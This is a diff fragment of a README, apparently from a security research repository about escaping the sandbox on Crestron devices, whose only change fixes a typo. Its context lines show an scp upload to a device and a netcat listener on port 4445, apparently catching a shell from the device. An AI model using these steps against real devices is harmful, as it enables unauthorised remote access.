brandonprry/crestron/README.md

 scp ip crestron@192.168.1.174:/User
 ```

-Once the connection is made, you can begin insteracting outside of the sandbox.
+Once the connection is made, you can begin interacting outside of the sandbox.

 ```
 Brandons-iMac:~ bperry$ nc -l 4445